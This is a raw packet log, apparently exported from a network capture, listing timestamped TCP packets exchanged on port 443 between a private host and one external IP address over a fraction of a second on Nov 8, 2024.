                                                                                      Nov 8, 2024 10:46:19.369226933 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.369276047 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.369401932 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.371100903 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.371112108 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.371351004 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.371360064 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.371417046 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.371593952 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.371648073 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.372903109 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.372912884 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.373209000 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.373234034 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.373239040 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.373416901 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.374820948 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.374831915 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.375159979 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.375159979 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.375169039 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.375302076 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.375327110 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.380156040 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.380166054 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.380301952 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.380541086 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.380551100 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.380630016 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.380747080 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.380955935 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.381112099 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.390819073 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.390831947 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.390899897 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.391187906 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.391189098 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.391273022 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.391334057 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.391366005 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.391431093 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.391654015 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.391702890 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.391799927 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.391861916 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.392123938 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.392187119 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.392266035 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.392425060 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.392595053 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.392604113 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.392798901 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.393835068 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.393843889 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.394143105 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.394153118 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.394207001 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.394295931 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.394387007 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.395617008 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.395626068 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.395957947 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.396044970 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.396054029 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.396156073 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.397607088 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.397618055 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.397922039 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.397931099 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.397977114 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.398050070 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.399257898 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.399267912 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.399482012 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.399492025 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.399624109 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.399672031 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.399722099 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.401664972 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.401674986 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.401899099 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.401906013 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.402081966 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.402149916 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.417973042 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.417984009 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.418126106 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.418163061 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.418262005 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.418287039 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.418364048 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.418373108 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.418478966 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.418488979 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.418618917 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.418678999 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.418683052 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.418955088 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.418965101 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.419019938 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.419111013 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.419294119 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.419425964 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.419475079 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.419485092 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.419579983 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.419958115 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.420160055 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.420167923 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.420412064 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.420789957 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.420799017 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.421750069 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.421760082 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.421986103 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.421994925 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.422065973 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.422142029 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.422204971 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.422296047 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.423784018 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.423791885 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.423999071 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.424141884 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.424145937 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.424232006 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.424455881 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.425569057 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.425576925 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.425873995 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.426069975 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.426079035 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.426732063 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.426966906 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.427146912 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.427207947 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.427365065 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.427371025 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.427434921 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.427535057 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.470300913 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.592710972 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.592721939 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.593084097 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.593094110 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.593188047 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.593472958 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.597937107 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.597945929 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.598062992 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.598191977 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.598280907 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.598289013 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.598345041 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.598449945 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.598608017 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.598840952 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.598917961 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.608063936 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.608072996 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.608266115 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.608359098 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.608450890 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.608459949 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.608647108 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.608649015 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.608748913 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.608865976 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.608877897 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.608927965 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.609096050 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.609766006 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.609776020 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.609955072 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.609961033 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.610058069 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.610174894 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.610265970 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.610903978 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.610912085 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.611207008 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.611277103 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.611335039 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.611344099 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.611438990 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.612749100 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.612760067 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.612998009 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.613008976 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.613049030 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.613126993 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.613322020 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.614784002 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.614793062 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.615025997 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.615144968 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.615154028 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.615261078 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.615329027 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.616555929 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.616569042 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.616833925 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.616842985 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.616993904 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.617033958 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.617635012 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.617649078 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.617870092 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.617876053 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.617952108 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.618052959 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.618118048 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.618235111 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.620167971 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.620181084 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.620333910 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.620333910 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.620605946 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.620615005 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.635190964 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.635209084 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.635320902 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.635437012 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.635447979 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.635513067 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.635837078 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.635905027 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.635958910 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.636077881 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.636100054 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.636228085 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.636344910 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.636595011 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.636616945 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.636620045 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.636621952 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.636724949 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.636801958 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.636924028 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.637089014 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.637216091 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.637305975 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.637320995 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.637449026 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.637630939 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.637634993 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.637772083 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.637954950 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.638008118 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.638150930 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.638358116 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.638546944 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.638556004 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.638813019 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.638982058 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.638987064 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.639034986 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.639394045 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.640590906 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.640600920 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.640847921 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.640925884 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.641014099 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.641022921 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.641148090 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.641259909 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.641731977 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.641741037 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.641902924 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.641954899 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.641962051 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.642143011 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.642190933 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.643486023 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.643495083 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.643755913 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.643846035 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.643850088 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.643937111 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.644119978 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.645374060 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.645384073 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.645693064 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.645860910 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.645865917 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.646070004 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.648499012 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.648508072 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.648633957 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.648866892 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.648875952 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.648931980 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.649074078 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.649255991 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.652641058 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.652957916 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.653050900 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.653059959 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.653206110 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.653284073 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.653374910 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.653531075 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.661200047 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.661209106 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.661494970 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.661545038 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.661554098 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.661612034 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.661644936 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.661669970 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.661679983 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.661751986 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.661880016 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.661889076 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.661978960 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.661988974 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.662098885 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.662137985 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.662214994 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.662220001 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.662266970 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.662270069 CET44349770172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:46:19.662410021 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.662565947 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.662658930 CET49770443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:46:19.662789106 CET49770443192.168.11.30172.67.137.62
